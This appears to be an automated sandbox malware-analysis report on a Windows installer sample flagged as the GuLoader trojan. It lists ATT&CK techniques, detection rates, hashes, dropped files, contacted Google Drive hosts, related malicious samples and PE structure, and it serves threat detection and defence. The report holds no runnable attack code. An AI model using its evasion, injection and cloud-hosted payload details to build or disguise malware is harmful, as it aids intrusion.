      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeCode function: 0_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_10001A5D
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeProcess created: C:\Users\user\Desktop\nRNzqQOQwk.exe "C:\Users\user\Desktop\nRNzqQOQwk.exe"Jump to behavior
      Source: C:\Users\user\Desktop\nRNzqQOQwk.exeCode function: 0_2_00405DC2 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,0_2_00405DC2
      Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
      Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Native API | 1 DLL Side-Loading | 1 Access Token Manipulation | 12 Masquerading | OS Credential Dumping | 11 Security Software Discovery | Remote Services | 1 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
      Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 11 Process Injection | 1 Virtualization/Sandbox Evasion | LSASS Memory | 1 Virtualization/Sandbox Evasion | Remote Desktop Protocol | 1 Clipboard Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
      Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 1 Access Token Manipulation | Security Account Manager | 3 File and Directory Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
      Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Process Injection | NTDS | 13 System Information Discovery | Distributed Component Object Model | Input Capture | 14 Application Layer Protocol | Traffic Duplication | Data Destruction
      Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Obfuscated Files or Information | LSA Secrets | Internet Connection Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
      Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | Wi-Fi Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
      Source | Detection | Scanner | Label | Link
      nRNzqQOQwk.exe | 67% | Virustotal | | Browse
      nRNzqQOQwk.exe | 71% | ReversingLabs | Win32.Trojan.Guloader |
      nRNzqQOQwk.exe | 100% | Avira | TR/AD.NsisInject.monhx |
      nRNzqQOQwk.exe | 100% | Joe Sandbox ML | |

      Source | Detection | Scanner | Label | Link
      C:\Users\user\AppData\Local\Temp\nsj1A28.tmp\System.dll | 0% | ReversingLabs | |
      No Antivirus matches
      No Antivirus matches
      Source | Detection | Scanner | Label | Link
      http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference. | 0% | Avira URL Cloud | safe |
      http://www.gopher.ftp://ftp. | 0% | Avira URL Cloud | safe |
      https://www.gstatic. | 0% | Avira URL Cloud | safe |
      https://translate.googleapi | 0% | Avira URL Cloud | safe |
      http://nsis.sf.net/NSIS_Error | 0% | Avira URL Cloud | safe |
      Name | IP | Active | Malicious | Antivirus Detection | Reputation
      drive.google.com | 142.250.190.110 | true | false | | high
      drive.usercontent.google.com | 142.250.190.97 | true | false | | high
      Name | Source | Malicious | Antivirus Detection | Reputation
00000001.00000003.14531787161.000000000683F000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://apis.google.comnRNzqQOQwk.exe, 00000001.00000003.14195151062.00000000067FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://drive.google.com/(nRNzqQOQwk.exe, 00000001.00000003.15233985037.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.15233856736.000000000683B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://ocsp.quovadisoffshore.com0nRNzqQOQwk.exe, 00000001.00000003.15233985037.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.15580218463.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14531658810.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.15233856736.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000002.16916833797.0000000006840000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.12845952675.0000000006840000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.12965484524.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.12853316877.0000000006840000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13077401848.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13968616030.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14419238478.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14419436535.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13968482023.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.16474207406.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13071150715.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.12959116605.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.12845828650.0000000006840000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.16473999157.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 
00000001.00000003.14531787161.000000000683F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://drive.google.com/enRNzqQOQwk.exe, 00000001.00000003.14531658810.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13077401848.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13968616030.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14419238478.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14419436535.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13968482023.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13071150715.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14531787161.000000000683F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://drive.google.com/anRNzqQOQwk.exe, 00000001.00000003.15233985037.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.15233856736.000000000683B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        IP | Domain | Country | ASN | ASN Name | Malicious
                                                        142.250.190.110 | drive.google.com | United States | 15169 | GOOGLEUS | false
                                                        142.250.190.97 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false
                                                        Joe Sandbox version:42.0.0 Malachite
                                                        Analysis ID:1587595
                                                        Start date and time:2025-01-10 15:28:21 +01:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 14m 8s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                        Run name:Suspected Instruction Hammering
                                                        Number of analysed new started processes analysed:5
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:1
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Sample name:nRNzqQOQwk.exe
                                                        Detection:MAL
                                                        Classification:mal72.troj.evad.winEXE@3/7@2/2
                                                        EGA Information:
                                                        • Successful, ratio: 50%
                                                        HCA Information:
                                                        • Successful, ratio: 77%
                                                        • Number of executed functions: 40
                                                        • Number of non-executed functions: 30
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .exe
                                                        • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                        • Exclude process from analysis (whitelisted): WerFault.exe, svchost.exe
                                                        • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
                                                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                        No simulations
                                                        No context
                                                        Match: 37f463bf4616ecd445d4a1937da06e19
                                                        Associated Sample Name / URL | Detection | Threat Name | Context
                                                        You7ynHizy.exe | malicious | GuLoader | 142.250.190.97, 142.250.190.110
                                                        Xjz8dblHDe.exe | malicious | GuLoader | 142.250.190.97, 142.250.190.110
                                                        zrNcqxZRSM.exe | malicious | CobaltStrike, Metasploit | 142.250.190.97, 142.250.190.110
                                                        CY SEC AUDIT PLAN 2025.docx.doc | malicious | Unknown | 142.250.190.97, 142.250.190.110
                                                        gem1.exe | malicious | CredGrabber, Meduza Stealer | 142.250.190.97, 142.250.190.110
                                                        FIWszl1A8l.exe | malicious | GhostRat | 142.250.190.97, 142.250.190.110
                                                        2873466535874-68348745.02.exe | malicious | Unknown | 142.250.190.97, 142.250.190.110
                                                        n41dQbiw1Y.exe | malicious | Babuk, Djvu | 142.250.190.97, 142.250.190.110
                                                        stage3.exe | malicious | CobaltStrike | 142.250.190.97, 142.250.190.110
                                                        Match: C:\Users\user\AppData\Local\Temp\nsj1A28.tmp\System.dll
                                                        Associated Sample Name / URL | Detection | Threat Name
                                                        ODjwCjQBAP.exe | malicious | GuLoader
                                                        ODjwCjQBAP.exe | malicious | GuLoader
                                                        Anfrage.exe | malicious | FormBook, GuLoader
                                                        Anfrage_244384.exe | malicious | FormBook, GuLoader
                                                        Anfrage_244384.exe | malicious | FormBook, GuLoader
                                                        Anfrage244384.exe | malicious | FormBook, GuLoader
                                                        Anfrage244384.exe | malicious | FormBook, GuLoader
                                                        Anfrage_244384.exe | malicious | FormBook, GuLoader
                                                        5112024976.exe | malicious | FormBook, GuLoader
                                                                          Process:C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):34
                                                                          Entropy (8bit):4.35937791471612
                                                                          Encrypted:false
                                                                          SSDEEP:3:oMXADiGWkon:xnGWn
                                                                          MD5:5BAD417385FA63549574090876DC680D
                                                                          SHA1:84E00066DC079E657BE9AF39E2C9E4EC42F5E527
                                                                          SHA-256:8B8CCA2780BD72F608E87BAEC979BBB17706AEFEB8D9F603E53AE144ECFAB71D
                                                                          SHA-512:EA709BAB31CFAAB4979617C4D1DFF414387F6988BE9F67E70BF7F941A9E7EA4C36CF320CE2518AE0DD9171DF5C46BE85D86D3F6031059A3CB3E79FD58E3F14E2
                                                                          Malicious:false
                                                                          Reputation:moderate, very likely benign file
                                                                          Preview:[Omniregent]..promovable=bugspyt..
                                                                          Process:C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):11264
                                                                          Entropy (8bit):5.7711167426271945
                                                                          Encrypted:false
                                                                          SSDEEP:192:OPtkumJX7zB22kGwfy0mtVgkCPOsX1un:/702k5qpdsXQn
                                                                          MD5:3F176D1EE13B0D7D6BD92E1C7A0B9BAE
                                                                          SHA1:FE582246792774C2C9DD15639FFA0ACA90D6FD0B
                                                                          SHA-256:FA4AB1D6F79FD677433A31ADA7806373A789D34328DA46CCB0449BBF347BD73E
                                                                          SHA-512:0A69124819B7568D0DEA4E9E85CE8FE61C7BA697C934E3A95E2DCFB9F252B1D9DA7FAF8774B6E8EFD614885507ACC94987733EBA09A2F5E7098B774DFC8524B6
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Joe Sandbox View:
                                                                          • Filename: ODjwCjQBAP.exe, Detection: malicious, Browse
                                                                          • Filename: ODjwCjQBAP.exe, Detection: malicious, Browse
                                                                          • Filename: Anfrage.exe, Detection: malicious, Browse
                                                                          • Filename: Anfrage_244384.exe, Detection: malicious, Browse
                                                                          • Filename: Anfrage_244384.exe, Detection: malicious, Browse
                                                                          • Filename: Anfrage244384.exe, Detection: malicious, Browse
                                                                          • Filename: Anfrage244384.exe, Detection: malicious, Browse
                                                                          • Filename: Anfrage_244384.exe, Detection: malicious, Browse
                                                                          • Filename: 5112024976.exe, Detection: malicious, Browse
                                                                          Reputation:moderate, very likely benign file
                                                                          Process:C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):457262
                                                                          Entropy (8bit):2.660957868808711
                                                                          Encrypted:false
                                                                          SSDEEP:3072:D/3hlxuinGt/VhqT1iOn8lRgQ69dV1Vbx:7oig/VYRJz9Xt
                                                                          MD5:CDE198D8ADD807141052775916060A46
                                                                          SHA1:BA64728F6A13AEE536B9EF46484A7938F52D9272
                                                                          SHA-256:C9BBC92FD69037DCCF745A1ECC71F4BCE8867E41CD9D2DCDB8332587A1A147B6
                                                                          SHA-512:898011AB3D1BAA68E702091C465F2BB1EBD172475CE73439A9BB8B205E68ABAFAE71776445BC7DC87227F9E0E80A04272944962C95CAE415786C252DEE256041
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Process:C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):193843
                                                                          Entropy (8bit):7.55628710093093
                                                                          Encrypted:false
                                                                          SSDEEP:3072:H39dlMnmxBSEy9gi65aaTlHepUWtyW8ImC/BN2WlIP7AKAKUHjjuXKc:X5SHWhTlHwhXNPTH2bUDjuac
                                                                          MD5:FFAC979D13A99BF107CED6B9BBA2B7E4
                                                                          SHA1:04E8B535A2B67D6CBAA54626492583D0DF1C9435
                                                                          SHA-256:482E699C60E1B448B9953352AB2840956AB56E9C5559B5C06CF4F48D5AF98781
                                                                          SHA-512:7DA199810F2A6B76FDA110D419EA35A424A0155DB814AA081F84F1C7CB0B9072E64D8B1A89F606D557A8B54AF8AC6395200F1CF281C28BC06101916C5285FFF3
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Process:C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):339393
                                                                          Entropy (8bit):1.2543469977620876
                                                                          Encrypted:false
                                                                          SSDEEP:1536:JwpZQcXbJ+mf8ME8s+dg5Z90uGaXF9Pl7:W4cX8ncmxhGm
                                                                          MD5:F6A8488B1B62B7AC3B0979C8FBEABB30
                                                                          SHA1:9725896EBC26CCB2CB9060640B9E0D4A0618916F
                                                                          SHA-256:34DC9B70D0CE5223A531E499611F1208F3AE85AAEF9973FC27E89190568F8EE2
                                                                          SHA-512:88A719685D0972290632C6B5A665184E79A98BE22B76AF28F18056F2E7A721A0B2D3B4A8815BCE562426643E69F998F9E45F3CA62B3288EAAFB71FE89A23AD20
                                                                          Malicious:false
                                                                          Process:C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):456047
                                                                          Entropy (8bit):1.2479728238915362
                                                                          Encrypted:false
                                                                          SSDEEP:768:WqBSYr/TzktUI9ql+6iD8iDu43pfrmQ+PHlyjwkZY51UG90JdfSDUsby4/FApmbO:I3TS9ymKhysrQEkRbwvL3xcbNyFN2Mv
                                                                          MD5:9911B32FE219697A738F39AE5766B512
                                                                          SHA1:DA67EBB043C778DEEA874E1C746483A2B65E533C
                                                                          SHA-256:1D3D52ECB41F725DC23080ACB1ACDFEDF29BB5F167DCB75F89AF837888421880
                                                                          SHA-512:FBF703CD56434BB14C6A1A34878F094BE183D9F638D0F34074F7EE4C9D12DB70A833679B496FCB1E4C6050C418A906221149AAC70035BCDA3C01D4272C0FE3E8
                                                                          Malicious:false
                                                                          Process:C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):276
                                                                          Entropy (8bit):4.348758704403097
                                                                          Encrypted:false
                                                                          SSDEEP:6:4s/IdpH+oqGSUkJOlUjvMzJ7HxXEp6JN+qIN2CGZgw9n7FmNIb+:4skpesSUAOlSsJ7BEpg+H2XWwTmCq
                                                                          MD5:668A01D3AF55A42FBFDBB1E9DD730B59
                                                                          SHA1:E0949D489A15516B3CD09F1043543C38E3688F1A
                                                                          SHA-256:6A7FEEBFE1F4330E611E6E1B3804619D329A9D3ABD3A3ECBD9D441F884E9999D
                                                                          SHA-512:CF3F03583667362ADCEA4DEB094513B84D3E275EBCC42A993F9293B7374618A1BA060D4C4BAE446C02B329DDE2A4579C152F54A1F7537A0F83A3E88406509459
                                                                          Malicious:false
                                                                          Preview:vulcanizable zoanthidae raalam osullivan,phantasmic oxyluminescence fluidness pickin raadelig.muslimer broder encyclopaedically bessarabian bvt.skyggespillene shellfishes urmi fume panocha imago,troskabseder cypriotes thalassian,udvandringskontorers telfonmontrens bugtalende.
                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                          Entropy (8bit):7.306164693512133
                                                                          TrID:
                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                          File name:nRNzqQOQwk.exe
                                                                          File size:616'800 bytes
                                                                          MD5:c616c105a117d63de2b4f818c8fdd3e0
                                                                          SHA1:fe7d7c8863a5f71e02b2b5b76e1a8f506b08dba7
                                                                          SHA256:a180642558a07876a9a047217ef75504a4fe7e1f02e22e1f19ffba8d33e6790a
                                                                          SHA512:71499f14196cfc6b3c2dd9d767ef3174083ff384fa642cb46086fdba4cfa5bb13d13f0f7491f1e3da55eab19c5b431f667c0851466241258840dcbd308b9fc1c
                                                                          SSDEEP:6144:GyI5s2239X0wH5ky98puy+AMRYEBx2fKIn4jmTYzCr/5/dwgEhWSdfoVLg6XLCLl:D22tHb8MRYEBxAnPTYzA/7wRhW906OLl
                                                                          TLSH:A0D4F183340558E0F4E20DB154BB8A6105BF9F7ABB95282FB3DC731614F225A4B3A7D6
                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........@............/...........s.../...............+.......Rich............................PE..L.....MX.................`....9....
                                                                          Icon Hash:8b1985c04404416d
                                                                          Entrypoint:0x403180
                                                                          Entrypoint Section:.text
                                                                          Digitally signed:true
                                                                          Imagebase:0x400000
                                                                          Subsystem:windows gui
                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                          Time Stamp:0x584DCA1F [Sun Dec 11 21:50:23 2016 UTC]
                                                                          TLS Callbacks:
                                                                          CLR (.Net) Version:
                                                                          OS Version Major:4
                                                                          OS Version Minor:0
                                                                          File Version Major:4
                                                                          File Version Minor:0
                                                                          Subsystem Version Major:4
                                                                          Subsystem Version Minor:0
                                                                          Import Hash:b78ecf47c0a3e24a6f4af114e2d1f5de
                                                                          Signature Valid:false
                                                                          Signature Issuer:CN="Congratulator Penetralia ", E=ida@Harpuneren9.Af, L=Wormsdorf, S=Sachsen-Anhalt, C=DE
                                                                          Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                          Error Number:-2146762487
                                                                          Not Before, Not After
                                                                          • 24/06/2024 05:12:24 24/06/2027 05:12:24
                                                                          Subject Chain
                                                                          • CN="Congratulator Penetralia ", E=ida@Harpuneren9.Af, L=Wormsdorf, S=Sachsen-Anhalt, C=DE
                                                                          Version:3
                                                                          Thumbprint MD5:5F1213D251D7C1248101800D2397AEFA
                                                                          Thumbprint SHA-1:A24C9A43698A21F20F2503099FDB0E547144AFA5
                                                                          Thumbprint SHA-256:46FA314984A20ACD8945B5BC70EC2590BB3B9E7A27C8EA9AE030A1512F819942
                                                                          Serial:79B8813DC1624EA9849722EC81B484F6FED3A8A4
                                                                          Instruction
                                                                          sub esp, 00000184h
                                                                          push ebx
                                                                          push esi
                                                                          push edi
                                                                          xor ebx, ebx
                                                                          push 00008001h
                                                                          mov dword ptr [esp+18h], ebx
                                                                          mov dword ptr [esp+10h], 00409198h
                                                                          mov dword ptr [esp+20h], ebx
                                                                          mov byte ptr [esp+14h], 00000020h
                                                                          call dword ptr [004070A8h]
                                                                          call dword ptr [004070A4h]
                                                                          cmp ax, 00000006h
                                                                          je 00007FD4D08FF153h
                                                                          push ebx
                                                                          call 00007FD4D09020C1h
                                                                          cmp eax, ebx
                                                                          je 00007FD4D08FF149h
                                                                          push 00000C00h
                                                                          call eax
                                                                          mov esi, 00407298h
                                                                          push esi
                                                                          call 00007FD4D090203Dh
                                                                          push esi
                                                                          call dword ptr [004070A0h]
                                                                          lea esi, dword ptr [esi+eax+01h]
                                                                          cmp byte ptr [esi], bl
                                                                          jne 00007FD4D08FF12Dh
                                                                          push ebp
                                                                          push 00000009h
                                                                          call 00007FD4D0902094h
                                                                          push 00000007h
                                                                          call 00007FD4D090208Dh
                                                                          mov dword ptr [007A1F44h], eax
                                                                          call dword ptr [00407044h]
                                                                          push ebx
                                                                          call dword ptr [00407288h]
                                                                          mov dword ptr [007A1FF8h], eax
                                                                          push ebx
                                                                          lea eax, dword ptr [esp+38h]
                                                                          push 00000160h
                                                                          push eax
                                                                          push ebx
                                                                          push 0079D500h
                                                                          call dword ptr [00407174h]
                                                                          push 00409188h
                                                                          push 007A1740h
                                                                          call 00007FD4D0901CB7h
                                                                          call dword ptr [0040709Ch]
                                                                          mov ebp, 007A8000h
                                                                          push eax
                                                                          push ebp
                                                                          call 00007FD4D0901CA5h
                                                                          push ebx
                                                                          call dword ptr [00407154h]
                                                                          Programming Language:
                                                                          • [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7428 | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x3c3000 | 0x28340 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x95610 | 0x1350 | .data
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x298 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x5e4a | 0x6000 | 30c42419b2e69d0fb178ad82fde5a6a6 | False | 0.6707356770833334 | data | 6.461674766148295 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x7000 | 0x1246 | 0x1400 | 43fab6a80651bd97af8f34ecf44cd8ac | False | 0.42734375 | data | 5.005029341587408 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x9000 | 0x399038 | 0x400 | 295703f29cbf0cc87537f54786ed1d01 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x3a3000 | 0x20000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x3c3000 | 0x28340 | 0x28400 | 0a923a42d1a39b5e7ff4cbf67045065c | False | 0.21775524068322982 | data | 4.016272150271427 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x3c3358 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | English | United States | 0.1348337868212469
RT_ICON | 0x3d3b80 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 38016 | English | United States | 0.24942190456169855
RT_ICON | 0x3dd028 | 0x5488 | Device independent bitmap graphic, 72 x 144 x 32, image size 21600 | English | United States | 0.286090573012939
RT_ICON | 0x3e24b0 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.2502952290977799
RT_ICON | 0x3e66d8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.3522821576763486
RT_ICON | 0x3e8c80 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.37828330206378985
RT_ICON | 0x3e9d28 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.4668032786885246
RT_ICON | 0x3ea6b0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.5106382978723404
RT_DIALOG | 0x3eab18 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0x3eac18 | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0x3ead38 | 0xc4 | data | English | United States | 0.5918367346938775
RT_DIALOG | 0x3eae00 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x3eae60 | 0x76 | data | English | United States | 0.7542372881355932
RT_VERSION | 0x3eaed8 | 0x128 | data | English | United States | 0.6114864864864865
RT_MANIFEST | 0x3eb000 | 0x33e | XML 1.0 document, ASCII text, with very long lines (830), with no line terminators | English | United States | 0.5542168674698795
DLL | Import
KERNEL32.dll | SetEnvironmentVariableA, Sleep, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, GetFileAttributesA, SetFileAttributesA, GetWindowsDirectoryA, GetTempPathA, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, ExitProcess, GetFullPathNameA, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, CloseHandle, SetCurrentDirectoryA, MoveFileA, CompareFileTime, GetShortPathNameA, SearchPathA, lstrcmpiA, SetFileTime, lstrcmpA, ExpandEnvironmentStringsA, GlobalUnlock, GetDiskFreeSpaceA, GlobalFree, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, GlobalAlloc
